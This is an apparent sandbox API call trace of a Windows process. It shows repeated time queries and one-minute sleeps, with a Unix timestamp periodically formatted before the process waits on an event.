	[0244.421] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x796457c0, dwHighDateTime=0x1d50a6a)) 
	[0244.421] Sleep (dwMilliseconds=0xea60) 
	[0244.437] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7966b920, dwHighDateTime=0x1d50a6a)) 
	[0244.437] Sleep (dwMilliseconds=0xea60) 
	[0244.453] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79691a80, dwHighDateTime=0x1d50a6a)) 
	[0244.453] Sleep (dwMilliseconds=0xea60) 
	[0244.468] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x796b7be0, dwHighDateTime=0x1d50a6a)) 
	[0244.468] Sleep (dwMilliseconds=0xea60) 
	[0244.484] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x796ddd40, dwHighDateTime=0x1d50a6a)) 
	[0244.484] Sleep (dwMilliseconds=0xea60) 
	[0244.508] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79703ea0, dwHighDateTime=0x1d50a6a)) 
	[0244.508] Sleep (dwMilliseconds=0xea60) 
	[0244.546] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x797762c0, dwHighDateTime=0x1d50a6a)) 
	[0244.546] Sleep (dwMilliseconds=0xea60) 
	[0244.562] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7979c420, dwHighDateTime=0x1d50a6a)) 
	[0244.562] Sleep (dwMilliseconds=0xea60) 
	[0244.577] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x797c2580, dwHighDateTime=0x1d50a6a)) 
	[0244.577] Sleep (dwMilliseconds=0xea60) 
	[0244.593] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x797e86e0, dwHighDateTime=0x1d50a6a)) 
	[0244.593] Sleep (dwMilliseconds=0xea60) 
	[0244.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7980e840, dwHighDateTime=0x1d50a6a)) 
	[0244.609] Sleep (dwMilliseconds=0xea60) 
	[0244.624] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x798349a0, dwHighDateTime=0x1d50a6a)) 
	[0244.624] Sleep (dwMilliseconds=0xea60) 
	[0244.640] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7985ab00, dwHighDateTime=0x1d50a6a)) 
	[0244.640] Sleep (dwMilliseconds=0xea60) 
	[0244.657] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79880c60, dwHighDateTime=0x1d50a6a)) 
	[0244.657] Sleep (dwMilliseconds=0xea60) 
	[0244.671] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x798a6dc0, dwHighDateTime=0x1d50a6a)) 
	[0244.671] Sleep (dwMilliseconds=0xea60) 
	[0244.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x798ccf20, dwHighDateTime=0x1d50a6a)) 
	[0244.687] Sleep (dwMilliseconds=0xea60) 
	[0244.702] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x798f3080, dwHighDateTime=0x1d50a6a)) 
	[0244.702] Sleep (dwMilliseconds=0xea60) 
	[0244.718] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x799191e0, dwHighDateTime=0x1d50a6a)) 
	[0244.718] Sleep (dwMilliseconds=0xea60) 
	[0244.733] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7993f340, dwHighDateTime=0x1d50a6a)) 
	[0244.734] Sleep (dwMilliseconds=0xea60) 
	[0244.749] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x799654a0, dwHighDateTime=0x1d50a6a)) 
	[0244.749] Sleep (dwMilliseconds=0xea60) 
	[0244.765] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7998b600, dwHighDateTime=0x1d50a6a)) 
	[0244.765] Sleep (dwMilliseconds=0xea60) 
	[0244.781] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x799b1760, dwHighDateTime=0x1d50a6a)) 
	[0244.781] Sleep (dwMilliseconds=0xea60) 
	[0244.796] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x799d78c0, dwHighDateTime=0x1d50a6a)) 
	[0244.796] Sleep (dwMilliseconds=0xea60) 
	[0244.812] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x799fda20, dwHighDateTime=0x1d50a6a)) 
	[0244.812] Sleep (dwMilliseconds=0xea60) 
	[0244.827] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79a23b80, dwHighDateTime=0x1d50a6a)) 
	[0244.827] Sleep (dwMilliseconds=0xea60) 
	[0244.843] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79a49ce0, dwHighDateTime=0x1d50a6a)) 
	[0244.843] Sleep (dwMilliseconds=0xea60) 
	[0244.858] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79a6fe40, dwHighDateTime=0x1d50a6a)) 
	[0244.858] Sleep (dwMilliseconds=0xea60) 
	[0244.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79a95fa0, dwHighDateTime=0x1d50a6a)) 
	[0244.874] Sleep (dwMilliseconds=0xea60) 
	[0244.890] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79abc100, dwHighDateTime=0x1d50a6a)) 
	[0244.890] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557897279\r\n") returned 12
	[0244.890] ResetEvent (hEvent=0xc) returned 1
	[0244.890] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0244.921] Sleep (dwMilliseconds=0xea60) 
	[0244.937] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79b2e520, dwHighDateTime=0x1d50a6a)) 
	[0244.937] Sleep (dwMilliseconds=0xea60) 
	[0244.952] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79b54680, dwHighDateTime=0x1d50a6a)) 
	[0244.952] Sleep (dwMilliseconds=0xea60) 
	[0244.967] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79b7a7e0, dwHighDateTime=0x1d50a6a)) 
	[0244.967] Sleep (dwMilliseconds=0xea60) 
	[0244.983] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79ba0940, dwHighDateTime=0x1d50a6a)) 
	[0244.983] Sleep (dwMilliseconds=0xea60) 
	[0244.999] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79bc6aa0, dwHighDateTime=0x1d50a6a)) 
	[0244.999] Sleep (dwMilliseconds=0xea60) 
	[0245.046] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79c38ec0, dwHighDateTime=0x1d50a6a)) 
	[0245.046] Sleep (dwMilliseconds=0xea60) 
	[0245.061] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79c5f020, dwHighDateTime=0x1d50a6a)) 
	[0245.061] Sleep (dwMilliseconds=0xea60) 
	[0245.077] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79c85180, dwHighDateTime=0x1d50a6a)) 
	[0245.077] Sleep (dwMilliseconds=0xea60) 
	[0245.092] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79cab2e0, dwHighDateTime=0x1d50a6a)) 
	[0245.092] Sleep (dwMilliseconds=0xea60) 
	[0245.108] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79cd1440, dwHighDateTime=0x1d50a6a)) 
	[0245.108] Sleep (dwMilliseconds=0xea60) 
	[0245.123] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79cf75a0, dwHighDateTime=0x1d50a6a)) 
	[0245.123] Sleep (dwMilliseconds=0xea60) 
	[0245.139] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79d1d700, dwHighDateTime=0x1d50a6a)) 
	[0245.139] Sleep (dwMilliseconds=0xea60) 
	[0245.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79d43860, dwHighDateTime=0x1d50a6a)) 
	[0245.155] Sleep (dwMilliseconds=0xea60) 
	[0245.180] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79d699c0, dwHighDateTime=0x1d50a6a)) 
	[0245.180] Sleep (dwMilliseconds=0xea60) 
	[0245.186] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79d8fb20, dwHighDateTime=0x1d50a6a)) 
	[0245.186] Sleep (dwMilliseconds=0xea60) 
	[0245.201] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79db5c80, dwHighDateTime=0x1d50a6a)) 
	[0245.201] Sleep (dwMilliseconds=0xea60) 
	[0245.218] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79ddbde0, dwHighDateTime=0x1d50a6a)) 
	[0245.218] Sleep (dwMilliseconds=0xea60) 
	[0245.232] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79e01f40, dwHighDateTime=0x1d50a6a)) 
	[0245.233] Sleep (dwMilliseconds=0xea60) 
	[0245.248] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79e280a0, dwHighDateTime=0x1d50a6a)) 
	[0245.248] Sleep (dwMilliseconds=0xea60) 
	[0245.264] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79e4e200, dwHighDateTime=0x1d50a6a)) 
	[0245.264] Sleep (dwMilliseconds=0xea60) 
	[0245.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79e74360, dwHighDateTime=0x1d50a6a)) 
	[0245.279] Sleep (dwMilliseconds=0xea60) 
	[0245.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79e9a4c0, dwHighDateTime=0x1d50a6a)) 
	[0245.295] Sleep (dwMilliseconds=0xea60) 
	[0245.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79ec0620, dwHighDateTime=0x1d50a6a)) 
	[0245.311] Sleep (dwMilliseconds=0xea60) 
	[0245.326] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79ee6780, dwHighDateTime=0x1d50a6a)) 
	[0245.326] Sleep (dwMilliseconds=0xea60) 
	[0245.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79f0c8e0, dwHighDateTime=0x1d50a6a)) 
	[0245.342] Sleep (dwMilliseconds=0xea60) 
	[0245.358] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79f32a40, dwHighDateTime=0x1d50a6a)) 
	[0245.358] Sleep (dwMilliseconds=0xea60) 
	[0245.373] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79f58ba0, dwHighDateTime=0x1d50a6a)) 
	[0245.373] Sleep (dwMilliseconds=0xea60) 
	[0245.388] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79f7ed00, dwHighDateTime=0x1d50a6a)) 
	[0245.389] Sleep (dwMilliseconds=0xea60) 
	[0245.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79fa4e60, dwHighDateTime=0x1d50a6a)) 
	[0245.404] Sleep (dwMilliseconds=0xea60) 
	[0245.420] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79fcafc0, dwHighDateTime=0x1d50a6a)) 
	[0245.420] Sleep (dwMilliseconds=0xea60) 
	[0245.436] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x79ff1120, dwHighDateTime=0x1d50a6a)) 
	[0245.436] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557899139\r\n") returned 12
	[0245.436] ResetEvent (hEvent=0xc) returned 1
	[0245.436] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0245.437] Sleep (dwMilliseconds=0xea60) 
	[0245.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a017280, dwHighDateTime=0x1d50a6a)) 
	[0245.451] Sleep (dwMilliseconds=0xea60) 
	[0245.466] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a03d3e0, dwHighDateTime=0x1d50a6a)) 
	[0245.466] Sleep (dwMilliseconds=0xea60) 
	[0245.482] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a063540, dwHighDateTime=0x1d50a6a)) 
	[0245.482] Sleep (dwMilliseconds=0xea60) 
	[0245.507] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a0896a0, dwHighDateTime=0x1d50a6a)) 
	[0245.507] Sleep (dwMilliseconds=0xea60) 
	[0245.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a0af800, dwHighDateTime=0x1d50a6a)) 
	[0245.514] Sleep (dwMilliseconds=0xea60) 
	[0245.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a0d5960, dwHighDateTime=0x1d50a6a)) 
	[0245.530] Sleep (dwMilliseconds=0xea60) 
	[0245.546] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a0fbac0, dwHighDateTime=0x1d50a6a)) 
	[0245.546] Sleep (dwMilliseconds=0xea60) 
	[0245.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a121c20, dwHighDateTime=0x1d50a6a)) 
	[0245.560] Sleep (dwMilliseconds=0xea60) 
	[0245.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a147d80, dwHighDateTime=0x1d50a6a)) 
	[0245.576] Sleep (dwMilliseconds=0xea60) 
	[0245.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a16dee0, dwHighDateTime=0x1d50a6a)) 
	[0245.591] Sleep (dwMilliseconds=0xea60) 
	[0245.607] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a194040, dwHighDateTime=0x1d50a6a)) 
	[0245.607] Sleep (dwMilliseconds=0xea60) 
	[0245.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a1ba1a0, dwHighDateTime=0x1d50a6a)) 
	[0245.623] Sleep (dwMilliseconds=0xea60) 
	[0245.638] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a1e0300, dwHighDateTime=0x1d50a6a)) 
	[0245.638] Sleep (dwMilliseconds=0xea60) 
	[0245.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a206460, dwHighDateTime=0x1d50a6a)) 
	[0245.654] Sleep (dwMilliseconds=0xea60) 
	[0245.669] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a22c5c0, dwHighDateTime=0x1d50a6a)) 
	[0245.669] Sleep (dwMilliseconds=0xea60) 
	[0245.685] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a252720, dwHighDateTime=0x1d50a6a)) 
	[0245.685] Sleep (dwMilliseconds=0xea60) 
	[0245.700] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a278880, dwHighDateTime=0x1d50a6a)) 
	[0245.700] Sleep (dwMilliseconds=0xea60) 
	[0245.716] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a29e9e0, dwHighDateTime=0x1d50a6a)) 
	[0245.716] Sleep (dwMilliseconds=0xea60) 
	[0245.763] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a310e00, dwHighDateTime=0x1d50a6a)) 
	[0245.763] Sleep (dwMilliseconds=0xea60) 
	[0245.779] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a336f60, dwHighDateTime=0x1d50a6a)) 
	[0245.779] Sleep (dwMilliseconds=0xea60) 
	[0245.794] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a35d0c0, dwHighDateTime=0x1d50a6a)) 
	[0245.794] Sleep (dwMilliseconds=0xea60) 
	[0245.810] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a383220, dwHighDateTime=0x1d50a6a)) 
	[0245.810] Sleep (dwMilliseconds=0xea60) 
	[0245.825] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a3a9380, dwHighDateTime=0x1d50a6a)) 
	[0245.826] Sleep (dwMilliseconds=0xea60) 
	[0245.842] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a3cf4e0, dwHighDateTime=0x1d50a6a)) 
	[0245.842] Sleep (dwMilliseconds=0xea60) 
	[0245.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a3f5640, dwHighDateTime=0x1d50a6a)) 
	[0245.857] Sleep (dwMilliseconds=0xea60) 
	[0245.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a41b7a0, dwHighDateTime=0x1d50a6a)) 
	[0245.873] Sleep (dwMilliseconds=0xea60) 
	[0245.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a441900, dwHighDateTime=0x1d50a6a)) 
	[0245.888] Sleep (dwMilliseconds=0xea60) 
	[0245.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a467a60, dwHighDateTime=0x1d50a6a)) 
	[0245.903] Sleep (dwMilliseconds=0xea60) 
	[0245.947] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a4b3d20, dwHighDateTime=0x1d50a6a)) 
	[0245.947] Sleep (dwMilliseconds=0xea60) 
	[0245.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a4d9e80, dwHighDateTime=0x1d50a6a)) 
	[0245.951] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557900940\r\n") returned 12
	[0245.951] ResetEvent (hEvent=0xc) returned 1
	[0245.951] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0245.982] Sleep (dwMilliseconds=0xea60) 
	[0245.997] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a54c2a0, dwHighDateTime=0x1d50a6a)) 
	[0245.997] Sleep (dwMilliseconds=0xea60) 
	[0246.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a572400, dwHighDateTime=0x1d50a6a)) 
	[0246.013] Sleep (dwMilliseconds=0xea60) 
	[0246.028] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a598560, dwHighDateTime=0x1d50a6a)) 
	[0246.028] Sleep (dwMilliseconds=0xea60) 
	[0246.044] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a5be6c0, dwHighDateTime=0x1d50a6a)) 
	[0246.044] Sleep (dwMilliseconds=0xea60) 
	[0246.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.060] Sleep (dwMilliseconds=0xea60) 
	[0246.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a60a980, dwHighDateTime=0x1d50a6a)) 
	[0246.075] Sleep (dwMilliseconds=0xea60) 
	[0246.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a630ae0, dwHighDateTime=0x1d50a6a)) 
	[0246.091] Sleep (dwMilliseconds=0xea60) 
	[0246.107] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a656c40, dwHighDateTime=0x1d50a6a)) 
	[0246.107] Sleep (dwMilliseconds=0xea60) 
	[0246.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a67cda0, dwHighDateTime=0x1d50a6a)) 
	[0246.122] Sleep (dwMilliseconds=0xea60) 
	[0246.138] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a6a2f00, dwHighDateTime=0x1d50a6a)) 
	[0246.138] Sleep (dwMilliseconds=0xea60) 
	[0246.153] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a6c9060, dwHighDateTime=0x1d50a6a)) 
	[0246.153] Sleep (dwMilliseconds=0xea60) 
	[0246.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a6ef1c0, dwHighDateTime=0x1d50a6a)) 
	[0246.183] Sleep (dwMilliseconds=0xea60) 
	[0246.184] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a715320, dwHighDateTime=0x1d50a6a)) 
	[0246.184] Sleep (dwMilliseconds=0xea60) 
	[0246.200] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7a73b480, dwHighDateTime=0x1d50a6a)) 
